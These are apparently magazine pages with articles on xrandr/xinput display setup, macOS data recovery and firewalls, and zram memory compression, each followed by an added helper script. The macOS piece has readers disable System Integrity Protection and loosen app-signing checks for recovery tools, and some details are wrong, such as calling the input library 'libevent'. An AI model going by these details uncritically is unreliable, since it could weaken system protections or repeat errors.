Even though various graphical tools exist to optimally adapt your existing hardware to the X Window System, you can also do this from a terminal using command-line tools. You simply need to use the right tool to make the setting you need. In this article, I will show how to adjust some typical display settings from the terminal using xrandr and xinput.

Setting up the Display

One problem that occurs time and time again relates to the correct display resolution. If you use several monitors or also use a projector, it is often difficult to determine the correct order of the devices so that you can use a mouse to easily switch between the windows of the different devices. You may also need to rotate the image shown on a display – for instance, if you have installed a projector upside down on the ceiling or want to use a monitor in portrait mode. To solve all of these problems, you can use the xrandr tool.

With xrandr, you can configure the X Window System's Resize and Rotate (RandR) extension to adjust the main window, which the X clients use for display purposes, to suit your needs. Using xrandr --listmonitors gives you an overview of all the monitors connected to the system and their current configurations:

xrandr --listmonitors

Monitors: 3
 0: +*eDP-1 1920/309x1080/174+3000+0  eDP-1
 1: +DP-2-2 1080/510x1920/287+0+0  DP-2-2
 2: +DP-2-3 1920/598x1080/336+1080+0  DP-2-3

You can use xrandr -q to see which modes the individual devices support. You can then set the desired mode for a device as follows:

xrandr --output DP-2-2 --left-of eDP-1 --mode 1920x1080

This command ensures that the monitor DP-2-2, which is connected to the computer's DisplayPort, uses a resolution of 1920x1080 pixels and says that the device is located to the left of the laptop's internal display (eDP-1). You can easily move the mouse to the left to switch from the internal display to the external monitor. If you operate the monitor in portrait mode, simply extend the command to include the --rotate left or --rotate right option as follows:

xrandr --output DP-2-2 --rotate left --left-of eDP-1 --mode 1920x1080

The following command is useful if you use a projector connected to an HDMI interface and you want to display an inverted image:

xrandr --output HDMI-1 --rotate inverted --mode 1920x1080

Setting up the Mouse and Touchpad

Another popular X Window System setting is the configuration for natural scrolling. Often on Linux, the default setting for the connected mouse and the internal touchpad behaves like a scroll bar, which differs from the behavior on a device with a touchscreen. In other words, scrolling up causes the screen to scroll up, and scrolling down causes it to scroll down. However, on a smartphone or tablet touchscreen, it is the other way around, which means that many users will want to adjust this setting on their laptops or desktops.

In the X Window System, the libevent library is responsible for processing a user's input events and reacting to them accordingly. The configuration for the individual input devices relies on the xinput tool. An overview of the available devices can be displayed using the xinput list command (Figure 1).

The natural scrolling setting relates to the mouse and touchpad. All the available configuration settings for these devices can be displayed with the help of

xinput list-props <ID>

where you replace the ID with the device name (Figure 2). This is also recommended, since the ID is not static
Listing 1: /etc/X11/xorg.conf.d/99-libinput.conf

# The xorg libinput driver spells this option NaturalScrolling (one word);
# "Natural Scrolling" with a space is not recognized and is silently ignored.
Section "InputClass"
    Identifier "MOSART Wireless Mouse"
    MatchProduct "MOSART Semi. 2.4G Wireless Mouse"
    Option "NaturalScrolling" "true"
EndSection

Section "InputClass"
    Identifier "Elan Touchpad"
    MatchProduct "Elan Touchpad"
    Option "NaturalScrolling" "true"
EndSection

Figure 1: With xinput list, you can see all available devices on your system. The xinput command displays all input devices.

and may well change. The following two commands give you the same results for both the mouse and the touchpad:

xinput list-props 14
xinput list-props 'MOSART Semi. 2.4G Wireless Mouse'

xinput list-props 17
xinput list-props 'Elan Touchpad'

To change the setting, you can go back to the ID as well as to the name of the respective setting:

xinput set-prop 14 326 1
xinput set-prop 'MOSART Semi. 2.4G Wireless Mouse' 'libinput Natural Scrolling Enabled' 1

xinput set-prop 17 326 1
xinput set-prop 'Elan Touchpad' 'libinput Natural Scrolling Enabled' 1

Figure 2: A device's configuration settings.

Persistent Settings

Keep in mind that the settings you make with xrandr and xinput are not persistent. To fix this problem, you have a variety of options. In the simplest case, you can create a startup file in which you enter the respective commands and then ensure that this file is called automatically by your desktop or window manager.

If you are looking for an approach that is independent of your desktop or window manager, you can also store the settings in the configuration file for the X server. Listing 1 shows an example for the libevent system. Another option is to create a script with the respective commands for each new X session. The advantage here is that you can also use the xrandr and xinput tools (and others) in this script without having to worry about the special syntax of the configuration file for the X Window System (see Listing 2).

Listing 2: /etc/X11/Xsession.d/99-libinput-xrandr.conf

xrandr --output eDP-1 --right-of DP-2-2 --mode 1920x1080
xrandr --output DP-2-2 --rotate left --left-of eDP-1 --mode 1920x1080
xinput set-prop 'MOSART Semi. 2.4G Wireless Mouse' 'libinput Natural Scrolling Enabled' 1
xinput set-prop 'Elan Touchpad' 'libinput Natural Scrolling Enabled' 1

Conclusions

The xrandr and xinput command-line tools help you make extensive settings for input and output devices on your systems. To make these settings persistent, be sure to store your settings in an X server configuration file or create a script using these tools.
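A per-login script in the spirit of Listing 2, added here as an example (not the article's own code): it looks the input devices up by name at each login, because the article notes that xinput IDs are not static, applies the two-monitor xrandr layout only when DP-2-2 is really connected, and reads each property back to verify the change. It assumes an Xorg session with the libinput driver, so the property name is the article's 'libinput Natural Scrolling Enabled'; the sample command outputs are constructed for offline testing.

```shell
#!/bin/sh
# Added example, not from the article: a login script that resolves input
# devices by name (xinput IDs change between sessions), applies the xrandr
# layout only when the external monitor is present, and verifies results.
# Assumes an Xorg session using the libinput driver (property name below).

PROP='libinput Natural Scrolling Enabled'

# Constructed sample outputs (shortened) so the parsers can be tested offline.
SAMPLE_XINPUT_LIST=$(cat <<'EOF'
⎡ Virtual core pointer                          id=2    [master pointer  (3)]
⎜   ↳ Virtual core XTEST pointer                id=4    [slave  pointer  (2)]
⎜   ↳ MOSART Semi. 2.4G Wireless Mouse          id=14   [slave  pointer  (2)]
⎜   ↳ Elan Touchpad                             id=17   [slave  pointer  (2)]
⎣ Virtual core keyboard                         id=3    [master keyboard (2)]
    ↳ AT Translated Set 2 keyboard              id=16   [slave  keyboard (3)]
EOF
)
SAMPLE_LIST_PROPS=$(cat <<'EOF'
Device 'Elan Touchpad':
    Device Enabled (186):   1
    libinput Natural Scrolling Enabled (326):   0
    libinput Natural Scrolling Enabled Default (327):   0
EOF
)
SAMPLE_XRANDR=$(cat <<'EOF'
Screen 0: minimum 320 x 200, current 3000 x 1920, maximum 16384 x 16384
eDP-1 connected primary 1920x1080+3000+0 (normal left inverted right x axis y axis) 309mm x 174mm
DP-2-2 connected 1080x1920+0+0 left (normal left inverted right x axis y axis) 510mm x 287mm
HDMI-1 disconnected (normal left inverted right x axis y axis)
EOF
)

# Print the xinput IDs of slave pointer devices whose name contains $1, reading
# `xinput list` output from stdin (one ID per line, nothing if none match).
pointer_ids_by_name() {
    grep -E 'slave +pointer' | grep -F -- "$1" | sed -n 's/.*id=\([0-9]*\).*/\1/p'
}

# Print the current value (0 or 1) of the natural-scrolling property from
# `xinput list-props` output on stdin; prints nothing if the device lacks it.
natural_scrolling_state() {
    sed -n "s/^[[:space:]]*$PROP ([0-9]*):[[:space:]]*\([01]\).*/\1/p"
}

# Succeed if output $1 is reported as connected in `xrandr -q` output on stdin.
output_connected() {
    grep -Eq "^$1 connected( |$)"
}

# Enable natural scrolling for every pointer whose name contains $1, then read
# the property back; returns non-zero if any device did not accept the change.
enable_natural_scrolling() {
    rc=0
    for id in $(xinput list | pointer_ids_by_name "$1"); do
        xinput set-prop "$id" "$PROP" 1 || { rc=1; continue; }
        state=$(xinput list-props "$id" | natural_scrolling_state)
        [ "$state" = 1 ] || { echo "device $id: $PROP still '$state'" >&2; rc=1; }
    done
    return $rc
}

# Apply the article's layout only when DP-2-2 is connected, so the script does
# not fail with "cannot find output" on an undocked laptop.
apply_layout() {
    if xrandr -q | output_connected DP-2-2; then
        xrandr --output DP-2-2 --rotate left --left-of eDP-1 --mode 1920x1080
    else
        xrandr --output eDP-1 --auto
    fi
}

# Only touch a live X session; the functions above stay testable without one.
if [ -n "$DISPLAY" ] && command -v xinput >/dev/null 2>&1; then
    apply_layout
    enable_natural_scrolling 'MOSART Semi. 2.4G Wireless Mouse'
    enable_natural_scrolling 'Elan Touchpad'
fi
```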
NUTS AND BOLTS  Rescuing macOS Data

macOS file recovery and security

Salvage

macOS on-board tools and third-party applications can help prevent the loss of files and make security and backup your first priority. By Thomas Joos

If data loss under macOS is the result of defective hard drives, you need to adopt a structured approach for file recovery. Since macOS 10.15, the operating system has separated the system from the data, wherein macOS creates one volume for the system and one for data. Both storage locations use the APFS filesystem. Users only have read permissions for the system volume, which does not impose any restrictions on the user when working. At the same time, however, this provides better protection for the system. However, you do need to take this into account when recovering data and be careful when using recovery programs.

Additionally, access to files and folders by third-party apps is restricted (see the “Security and Privacy” box). The protected directories include Documents, Desktop, the iCloud drive, and Downloads. Furthermore, apps are not allowed to access external drives without permission. Another protection is that Gatekeeper in macOS checks whether apps are digitally signed and originate from the App Store. Starting in version 10.15, the system repeats this test regularly – not just when first launched.

If you use a data recovery program and read this hard drive, you could aggravate the problem. If data has been lost because of a defective hard drive, the first step is to stop using the system. If it is clear that the hard drive is causing the trouble but is still generally working, it can be useful to make a complete copy of the disk (e.g., with Clonezilla [1]) before starting data recovery measures. After booting the Mac, the system can create an image of the disk; only then does it make sense to try to recover the data with data recovery tools.

Security and Privacy
Before I go into detail about the individual methods for dealing with recovering data on macOS, note that in System Preferences | Security & Privacy under the General tab, the Allow apps downloaded from option usually should have only the App Store item selected. However, you will not be able to use some of the tools presented here if this is the case. To install these programs, you can enable App Store and identified developers now, and then change the settings back when you're done.

Restore Data with On-Board Tools

Like Windows, macOS has a recycle (Trash) bin from which users can recover data. If synchronization with iCloud is activated in the settings on the Mac, then accidentally deleted data can be partially recovered from icloud.com on devices that are logged in with the same Apple account. These settings can be found in System Preferences | Apple ID | iCloud under the Options button (Figure 1).

Various volumes such as USB sticks have their own Trash bins. Some skill is required here because you can recover data from hidden files in the terminal. In the Finder, you can use the Cmd+Shift+. (period) keyboard shortcut to show hidden files.

The Library folder often still contains copies of deleted Microsoft Office documents. To open the Finder, press Cmd+Shift+G and enter the path (~/Library). Note that you have at least two Library folders: the system Library folder at the root level of your hard drive and the user Library folder under each user account on the system. The instructions here access the user folder. After that, search for the desired files in this folder. macOS also displays the Library folder when you hold down the Option key and click Go in the Finder menu. This is where you will find numerous files that can possibly help with file recovery.
To search for hidden files in the terminal, you can configure macOS to show hidden files there:

defaults write com.apple.Finder AppleShowAllFiles true
killall Finder

The false option lets you switch off the display again. On external data media, the Trash bin can be found as the .Trashes folder, where you might find further files that you can restore with the terminal.

Figure 1: macOS can sync data to iCloud for recovery of lost files.

Time Machine is available in macOS as a general data backup tool. The service can regularly and automatically back up entire volumes on Mac computers (Figure 2). Either external hard drives or network devices that support Time Machine serve as backup targets. Most network attached storage (NAS) devices can easily be linked to the backup software [2]. The TimeMachineEditor software [3] puts you in control of the various backups and schedules. The tool uses the basic Time Machine settings and does not need to run 24/7. Once you have adjusted the settings for Time Machine to your requirements, you can exit TimeMachineEditor.

Figure 2: Time Machine is a good choice for use as a macOS data backup tool.

Recovering Files with Tools

If the machine has neither a Time Machine backup nor an iCloud synchronization and the documents are also no longer available in the Trash, you have to rely on additional tools. One well-known example is Disk Drill [4]. However, the free version is limited and can only display files that can be recovered. For just under $90 you can acquire the Pro version, which lets you recover data. An alternative product is EaseUS Data Recovery Wizard for Mac [5], which can also search for recoverable files in the free version and then recover them with the commercial variant (~$90/month or $170 lifetime).

For both tools to work properly, you need to allow access to the disks in System Preferences | Security & Privacy. Click on the Privacy tab and scroll down the left pane to the bottom, where you can choose Full Disk Access. You'll have to click the lock to make changes; then, you can click the Plus symbol under the right window and add the application. After that, the tools can scan your disks.

If these two tools do not help you, the professional Recoverit [6] is a good alternative. Here, too, you can test free of charge whether deleted files can be recovered. If this works, you can also recover Microsoft Office documents with the commercial version.

The Free Mac Any Data Recovery software [7] offers a wizard to help you recover accidentally deleted files, even if they are no longer available in the Trash bin. After starting the tool, you can select which data you want to revive and where it should be placed. However, the tool requires some Mac experience, because you need to disable the System Integrity Protection feature in macOS. To do this, start the computer in the built-in recovery mode with the Cmd+R
keyboard shortcut. In the recovery environment terminal, turn off the function and check the status with:

csrutil disable
csrutil status

After that, restart the Mac and you can use Free Mac Any Data Recovery (Figure 3). If the tool does not find data during the first scan, you can start an extended deep scan, which can take some time. The lower area shows the volume of data the system has found.

Once your work is done, you will want to re-enable the System Integrity Protection feature with

csrutil enable

If the built-in recovery operating system does not start, you can also download the required program from the web by starting the Mac in Internet recovery mode with the Cmd+Alt+R keyboard shortcut.

The last tool for data recovery I would like to introduce is PhotoRec [8]. It does not require any installation and starts from a USB stick. Working with the tool is a bit more complicated than with the others, but PhotoRec can often recover files where other programs fail.

To begin, unpack the download archive and launch PhotoRec. macOS blocks the program run by default, because the tool does not come from a verified developer. Therefore, you need to approve execution in System Preferences | Security & Privacy under the General tab. PhotoRec needs to run with root privileges in macOS. Double-clicking the file will open the Terminal and wait for you to enter your password; otherwise, you can run the program with sudo in the terminal. Once the tool is running, select the hard drive and the type of partition table from which you want to recover data.

Figure 3: Data recovery with Free Mac Any Data Recovery is a tad more complicated than with comparable tools; however, it rewards the user with superior results.

Creating a Bootable USB Stick

A bootable USB stick is helpful to ensure that no data needs to be downloaded off the web when reinstalling macOS and the installation is performed locally. As a bonus, this tool is also good for data recovery, because it lets you recover data, even without a working Internet connection. The USB stick should have a capacity of at least 16GB. To start, delete the original data from the stick with Disk Utility. As the format, use Mac OS Extended (Journaled) and the scheme GUID Partition Table. Choose a name (e.g., USB). You will need this name when you create the stick in Terminal:

sudo /Applications/Install\ macOS\ Big\ Sur.app/Contents/Resources/createinstallmedia --volume /Volumes/<my Volume>/ --nointeraction
sudo /Applications/Install\ macOS\ Big\ Sur.app/Contents/Resources/createinstallmedia --volume /Volumes/USB/ --nointeraction

If the macOS installation does not work properly during a restore, you can restart the Mac by holding down the power button for 10 seconds. At this point, it is important that you unplug all external devices from the Mac, if possible. Alternatively, reset the System Management Controller (SMC) [9], which especially helps with driver problems. Resetting the parameter RAM and the non-volatile RAM (NVRAM) can also help with problems [9].

Avoiding Data Loss with More Security

To prevent data loss on a Mac, especially if it is used in a home office or on the road, it is a good idea to look at the various firewall options. Although the operating system has a built-in firewall, attackers can work around it easily with additional tools. The first thing
you should do is check System Preferences | Security & Privacy | Firewall to see whether the firewall is active, which is not the case after installing macOS 11. To enable the firewall, click on the lock icon, enter your Apple ID, and start protection by clicking the Turn On Firewall button, which will make advanced security options available from the Firewall Options button.

An external tool is necessary to keep a general overview of the programs that open Internet connections. Although the macOS built-in firewall blocks incoming connections, it does not give you control over outgoing traffic. The open source LuLu [10] firewall allows more control.

After installing LuLu, you can specify which Apple applications you want the firewall to allow automatically. You can also automatically approve the internal macOS applications and block only external programs. The settings are in the Preferences option under the Shield in the menubar. For each program that tries to establish an Internet connection, a window appears that displays the details, where you can define whether the respective application is allowed to communicate externally. Allow permits the data traffic, whereas Block prevents it. If you want to allow only temporary access, then use the temporarily option. LuLu has a rules menu item that lets you call up the firewall rules to configure access or delete rules. If the application tries to access the Internet again, LuLu displays a window, and you can decide whether to allow or block.

Clean Up and Optimize macOS
The free AppCleaner [11] software lets you remove apps and associated files that are no longer needed. The tool searches for these files stored on the system and deletes them. Documents you have created with the apps being interrogated are, of course, not affected by this procedure. The tool on a macOS 12 system reliably found all linked directories and folders in my tests. You do not have to perform the deletion process with the tool itself, but you can search for the files and directories in the Finder and delete the associated files and directories yourself. In this way, you can free up storage space and optimize the system at the same time. You can also avoid data loss with the tool, because it removes programs you no longer need in a controlled way.

Conclusions

To avoid data loss from the outset, it makes sense to start with system security and keep an eye on the firewall and outbound network traffic. If a mishap does happen, the tools and on-board resources presented here can help you recover data, which is easiest if a data backup with Time Machine has been implemented. See also the “Clean Up and Optimize macOS” box for a way to keep your filesystem orderly.

Info
[1] Clonezilla: https://clonezilla.org
[2] Restoring files with Time Machine and Spotlight: https://support.apple.com/guide/mac-help/recover-files-time-machine-spotlight-mh15136/mac
[3] TimeMachineEditor: https://tclementdev.com/timemachineeditor/
[4] Disk Drill: https://www.cleverfiles.com
[5] EaseUS Data Recovery Wizard for Mac: https://www.easeus.com/mac/mac-data-recovery/
[6] Recoverit: https://recoverit.wondershare.com/data-recovery-mac.html
[7] Free Mac Any Data Recovery: https://mac-data-recovery.com/free-mac-any-data-recovery.html
[8] PhotoRec: https://www.cgsecurity.org
[9] Reset SMC, PRAM, and NVRAM: https://www.macworld.com/article/224955/how-to-reset-a-macs-nvram-pram-and-smc.html
[10] LuLu: https://objective-see.com/products/lulu.html
[11] AppCleaner: https://freemacsoft.net/appcleaner/

The Author
Thomas Joos is a freelance IT consultant and has been working in IT for more than 20 years. In addition, he writes hands-on books and papers on Windows and other Microsoft topics. Online you can meet him on http://thomasjoos.spaces.live.com.
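A small check script, added here as an example (not the article's own code), for the three things the article says to verify once recovery work is done: System Integrity Protection is back on (csrutil enable), the application firewall is enabled (it is off after installing macOS 11), and Time Machine has a recent backup. The parsers take each tool's output on stdin so they can be tested with the constructed samples below; the commands themselves (csrutil, socketfilterfw, tmutil) exist only on macOS.

```shell
#!/bin/sh
# Added example, not from the article: post-recovery checks for SIP, the
# application firewall, and Time Machine. The real commands only exist on
# macOS; the parsing functions are pure so they can be tested anywhere.

SOCKETFILTERFW=/usr/libexec/ApplicationFirewall/socketfilterfw

# Constructed sample outputs for offline tests.
SAMPLE_SIP_ON='System Integrity Protection status: enabled.'
SAMPLE_SIP_OFF='System Integrity Protection status: disabled.'
SAMPLE_FW_ON='Firewall is enabled. (State = 1)'
SAMPLE_FW_OFF='Firewall is disabled. (State = 0)'
SAMPLE_TM='/Volumes/Backup/Backups.backupdb/MacBook/2022-01-14-090530'

# Map `csrutil status` output on stdin to enabled / disabled / unknown.
sip_state() {
    case "$(cat)" in
        *'status: enabled'*)  echo enabled ;;
        *'status: disabled'*) echo disabled ;;
        *)                    echo unknown ;;
    esac
}

# Map `socketfilterfw --getglobalstate` output on stdin to on / off / unknown
# (State 2 means "block all incoming", which also counts as on).
firewall_state() {
    case "$(cat)" in
        *'State = 1'*|*'State = 2'*) echo on ;;
        *'State = 0'*)               echo off ;;
        *)                           echo unknown ;;
    esac
}

# Print the YYYY-MM-DD part of a `tmutil latestbackup` path on stdin, or
# nothing when no backup path is present.
latest_backup_date() {
    sed -n 's|.*/\([0-9]\{4\}-[0-9][0-9]-[0-9][0-9]\)-[0-9]\{6\}.*|\1|p'
}

# Run the live checks; the exit status is the number of findings (0 = all good).
check_mac() {
    findings=0
    if [ "$(csrutil status | sip_state)" != enabled ]; then
        echo 'FINDING: System Integrity Protection is not enabled (run csrutil enable from recovery)'
        findings=$((findings + 1))
    fi
    if [ "$("$SOCKETFILTERFW" --getglobalstate | firewall_state)" != on ]; then
        echo 'FINDING: application firewall is off (System Preferences | Security & Privacy | Firewall)'
        findings=$((findings + 1))
    fi
    last=$(tmutil latestbackup 2>/dev/null | latest_backup_date)
    if [ -z "$last" ]; then
        echo 'FINDING: no Time Machine backup found'
        findings=$((findings + 1))
    else
        echo "last Time Machine backup: $last"
    fi
    return $findings
}

# Only run the live checks on macOS; elsewhere the parsers remain testable.
if [ "$(uname)" = Darwin ]; then
    check_mac
fi
```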
NUTS AND BOLTS  Performance Tuning Dojo

Stretching devices with limited resources

Fewer Memories

Compressed memory solutions for small memory problems. By Federico Lucifredi

Small embedded devices running Linux often face a trade-off between limited resources in CPU and RAM and the abysmal write performance of SD card storage with abundant capacity. The first rule, as I discussed back in 2018 [1], is to make exclusive use of high-quality SD cards for boot devices – a class 10 device or better for starters – with a reputable brand name printed on it. (I recommend SanDisk or Samsung SD cards.) Lower quality SD cards simply cannot satisfy the write pressure of system boot or other peak logging moments of operation, and while suitable for data, they cannot be used as boot devices. These are the basic table stakes, but this being Linux, you can of course optimize further!

Test Bench

I am going to discuss a specific board for this column to try out the theories in practice. I will be using a Marvell ESPRESSObin [2] v7 (Figure 1), a low-cost, low-power board made by Globalscale Technologies. The ESPRESSObin was one of the earliest single-board computers (SBCs) to sport a 64-bit ARM CPU and remains remarkable today for its inclusion of a SATA port and PCI expansion. The full spec of the board is interesting in its own right (Table 1), but here I will focus on the setup for my tests. I use the external 12V power supply provided and the USB interface for serial access.

On the client side, I employ the handy Serial [3] Mac program, which includes userspace implementations of driver stacks for the two common USB-to-serial chipsets, eliminating the hassle of installing or updating drivers on multiple computers (and the reboots that go with those Mach kernel modules). The connection runs at 115,200 baud, with no flow control and no parity.

The board bootstraps with U-Boot [4], and from there it loads the operating

Table 1: ESPRESSObin Technical Specs

SOC                Marvell Armada 3700LP (88F3720) ARM Cortex A53 processor, dual core up to 1.2GHz
System memory      2GB DDR4 (1GB models also ship)
Storage            1x SATA interface; 1x micro SD card slot; footprint for optional 4GB eMMC (not populated)
Network            1x Topaz networking switch; 2x GbE LAN; 1x Ethernet WAN; 1x MiniPCIe slot
USB                1x USB 3.0; 1x USB 2.0; 1x micro-USB port
Expansion          2x 46-pin GPIO headers for I2C, GPIOs, PWM, UART, SPI, MMC
Misc               Reset button; JTAG interface
Power supply       12V DC jack; 5V via micro-USB port
Power consumption  Less than 1W thermal design power (TDP) at 1GHz

Figure 1: ESPRESSObin v7 SBC shown in the 2GB of RAM and no embedded MultiMediaCard (eMMC) variety.
system. Because the board was first released in 2017, the natural places to build current OS images are the Yocto project [5] and Armbian [6], a community-managed distribution that builds board-specific images of Ubuntu and Debian. I chose to use the stable Armbian build of Debian Stretch for the ESPRESSObin, and the results are shown in Figure 2.

Figure 2: Armbian bootup screen on ESPRESSObin v7 right after login.

The Right Trade-off

On systems with lots of storage and not enough RAM, one is naturally inclined to think about turning some of the permanent storage into swap space [7]. Unfortunately, the low write performance of SD card storage precludes this avenue to most embedded SBCs. The sensible strategy here is to turn some of the RAM into a write-friendly device and to stretch the amount of RAM allocated with the use of inline data compression for that partition.

I chose Armbian partly because it is a distribution that turns to this strategy by default. Figure 3 shows Armbian using a zram [8] device to store /var/log, offloading the primary source of boot-time writes from the physical device to a 50MB RAM drive. Zram, introduced by kernel 3.14 and considered stable, creates a block device in RAM and compresses writes to it on the fly. Default zram configurations on Debian and Ubuntu (controlled by the zram-config package) also create one swap device per CPU core, as seen in Figure 3. The increase in CPU load is counterbalanced by the availability of more memory, as existing RAM is stretched with the use of compression.

Figure 3: Three zram partitions were found in my system: two for Linux swap and one for logs.

Starting with kernel 4.14, zram can be configured as a write-back cache committing data to permanent storage in the background. Until then, this was commonly accomplished with zswap [9], a lightweight memory page compression driver that operates exclusively as a writeback cache for swap.

Swap Usage

Some important workloads, most notably Kubernetes, are openly averse to swap, preferring to address resource limits early rather than accept performance degradation and inconsistency. At the edge or in the Internet of Things (IoT), you have to work with the hardware you have and compromises are more likely. Either way, the free [10] command provides a simple avenue to check swap use (Listing 1). Currently the system described is not using swap.

Listing 1: Checking Swap

root@espressobin:~# free
              total        used        free      shared  buff/cache   available
Mem:        2046088       82796     1834332        5548      128960     1891416
Swap:       1023040           0     1023040
root@espressobin:~#

Listing 2: Initializing Zram the Hard Way

# Aligning versions between kernel and modules referenced by virtual package
$ sudo apt update; sudo apt upgrade
$ sudo apt install -y linux-image-extra-virtual
# Create half a gigabyte ZRAM device at next available device file
$ zramctl --find --size=512M
/dev/zram0
$ zramctl
NAME       ALGORITHM DISKSIZE DATA COMPR TOTAL STREAMS MOUNTPOINT
/dev/zram0 lzo-rle       512M   0B    0B    0B       2
# Make the ZRAM block device into a swap partition
$ sudo mkswap /dev/zram0
Setting up swapspace version 1, size = 512 MiB (536866816 bytes)
no label, UUID=0818f196-4e38-43be-88ad-de6b45f50ce5
# Turn the swap partition on (swapon needs root, like mkswap above)
$ sudo swapon /dev/zram0
$ zramctl
NAME       ALGORITHM DISKSIZE DATA COMPR TOTAL STREAMS MOUNTPOINT
/dev/zram0 lzo-rle       512M   4K   73B   12K       2 [SWAP]
# Cleanup procedure (destroy the ZRAM setup)
$ sudo swapoff /dev/zram0
$ sudo zramctl --reset /dev/zram0

Setup

Zswap is easily configured by passing the parameter zswap.enabled=1 to the kernel at boot in GRUB configuration
options. Zram is more complicated, and not nearly as well documented as one would expect in most distributions. Listing 2 shows how to set up two swap devices (and how to initialize and tear down the first one) with exclusively manual steps on Ubuntu Server 20.04 LTS. Listing 3 makes use of the zram-config package found in Ubuntu (again, Server version 20.04 LTS) to automate part of the process to mount a second device as a RAM drive for /var/logs.

Listing 3: Initializing Zram the Easy Way

    # install Ubuntu's ZRAM management package
    $ sudo apt install zram-config
    # start the service
    $ sudo systemctl start zram-config
    $ zramctl
    NAME       ALGORITHM DISKSIZE DATA COMPR TOTAL STREAMS MOUNTPOINT
    /dev/zram1 lzo-rle     495.8M   4K   73B   12K       2 [SWAP]
    # Now let's make a ramdrive for /var/logs (needs root)
    $ sudo zramctl --find --size=512M
    /dev/zram0
    # lay a filesystem on the ramdrive
    $ sudo mkfs.ext2 -q /dev/zram0
    # mount the ramdrive
    $ sudo mount /dev/zram0 /var/log
    $ zramctl
    NAME       ALGORITHM DISKSIZE DATA COMPR TOTAL STREAMS MOUNTPOINT
    /dev/zram0 lzo-rle       512M 208K  3.1K   48K       2 /var/log
    /dev/zram1 lzo-rle     495.8M   4K   73B   12K       2 [SWAP]

Info

[1] "Assess USB performance while exploring storage caching" by Federico Lucifredi, ADMIN, issue 48, 2018, pg. 94, [https://www.admin-magazine.com/Archive/2018/48/Assess-USB-performance-while-exploring-storage-caching]
[2] Marvell ESPRESSObin v7: [http://wiki.espressobin.net/tiki-index.php]
[3] Serial 2.12 for Macintosh: [https://www.decisivetactics.com/products/serial/]
[4] Das U-Boot – the Universal Boot Loader: [https://www.denx.de/wiki/U-Boot]
[5] Yocto Project: [https://www.yoctoproject.org]
[6] Armbian – Linux for ARM development boards: [https://www.armbian.com/espressobin/]
[7] "Swap tricks" by Federico Lucifredi, ADMIN, issue 9, 2012, pg. 83
[8] Kernel docs for zram: [https://www.kernel.org/doc/html/latest/admin-guide/blockdev/zram.html]
[9] Kernel docs for zswap: [https://www.kernel.org/doc/html/latest/admin-guide/mm/zswap.html]
[10] free(1) man page: [https://linux.die.net/man/1/free]

The Author

Federico Lucifredi (@0xf2) is the Product Management Director for Ceph Storage at Red Hat, formerly the Ubuntu Server Product Manager at Canonical, and the Linux "Systems Management Czar" at SUSE. He enjoys arcane hardware issues and shell-scripting mysteries and takes his McFlurry shaken, not stirred. You can read more from him in the O'Reilly title AWS System Administration.
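As an added example (not part of the article), the Python below parses the zramctl and free tables shown in Listings 1 and 3 and turns them into a per-device compression ratio and a swap-in-use percentage, so the "is this host swapping, and is zram earning its CPU cost?" check from the Swap Usage section can be scripted rather than eyeballed. The sample strings are copied from the listings; the size-suffix handling assumes the binary (1K = 1024) units util-linux prints.

```python
import re

_UNITS = {"B": 1, "K": 1024, "M": 1024 ** 2, "G": 1024 ** 3, "T": 1024 ** 4}  # binary suffixes


def parse_size(text):
    """Convert a zramctl size such as '495.8M' or '73B' to bytes."""
    m = re.fullmatch(r"([0-9]*\.?[0-9]+)([BKMGT])", text)
    if not m:
        raise ValueError("unrecognised size: %r" % text)
    return int(float(m.group(1)) * _UNITS[m.group(2)])


def parse_zramctl(output):
    """Map device name -> fields (in bytes) from a `zramctl` table."""
    lines = [ln for ln in output.strip().splitlines() if ln.strip()]
    header = lines[0].split()
    devices = {}
    for line in lines[1:]:
        row = dict(zip(header, line.split()))  # MOUNTPOINT absent when unused
        devices[row["NAME"]] = {
            "disksize": parse_size(row["DISKSIZE"]),
            "data": parse_size(row["DATA"]),    # logical bytes written to the device
            "compr": parse_size(row["COMPR"]),  # the same bytes after compression
            "total": parse_size(row["TOTAL"]),  # RAM actually consumed, incl. metadata
            "mountpoint": row.get("MOUNTPOINT"),
        }
    return devices


def compression_ratio(dev):
    # Logical bytes stored per byte of RAM consumed; below 1 means the
    # allocator's overhead exceeds the data (typical of a nearly empty device).
    return dev["data"] / dev["total"] if dev["total"] else 0.0


def swap_in_use_percent(free_output):
    """Share of swap in use, from the Swap: line of `free` (kibibytes)."""
    for line in free_output.splitlines():
        if line.startswith("Swap:"):
            total, used = (int(x) for x in line.split()[1:3])
            return 100.0 * used / total if total else 0.0
    raise ValueError("no Swap: line in free output")


# Sample input copied from Listing 3 and Listing 1 of the article.
ZRAMCTL_SAMPLE = """\
NAME       ALGORITHM DISKSIZE DATA COMPR TOTAL STREAMS MOUNTPOINT
/dev/zram0 lzo-rle       512M 208K  3.1K   48K       2 /var/log
/dev/zram1 lzo-rle     495.8M   4K   73B   12K       2 [SWAP]
"""
FREE_SAMPLE = """\
              total        used        free      shared  buff/cache   available
Swap:       1023040           0     1023040
"""
```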

Contact Info

Editor in Chief: Joe Casad, [email protected]
Managing Editors: Rita L Sooby, [email protected]; Lori White, [email protected]
Senior Editor: Ken Hess
Localization & Translation: Ian Travis
News Editor: Jack Wallen
Copy Editors: Amy Pettle, Aubrey Vaughn
Layout: Dena Friesen, Lori White
Cover Design: Dena Friesen, Illustration based on graphics by vska, 123RF.com
Advertising: Brian Osborn, [email protected], phone +49 8093 7679420
Publisher: Brian Osborn
Marketing Communications: Gwen Clark, [email protected]
Linux New Media USA, LLC, 4840 Bob Billings Parkway, Ste 104, Lawrence, KS 66049 USA
Customer Service / Subscription:
  For USA and Canada: Email [email protected], Phone 1-866-247-2802 (Toll Free from the US and Canada)
  For all other countries: Email [email protected]
www.admin-magazine.com

Authors (page)

Thomas Bär 30
Günter Baumgar 52
Jens-Christoph Brendel 16, 26
Chris Dock 34
Marco Föllmer 78
Rainer W. Gerling 43
Marc Grote 74
Ken Hess 3
Thomas Joos 70, 90
Jeff Layton 46
Rubén Llorente 64
Martin Loschwitz 10, 20, 80
Federico Lucifredi 94
Dr. Holger Reibold 40
Thorsten Scherf 88
Frank-Michael Schlede 30
Jens-Henrik Söldner 58
Jack Wallen 8
Matthias Wübbeling 62, 86

While every care has been taken in the content of the magazine, the publishers cannot be held responsible for the accuracy of the information contained within it or any consequences arising from the use of it. The use of the DVD provided with the magazine or any material provided on it is at your own risk.

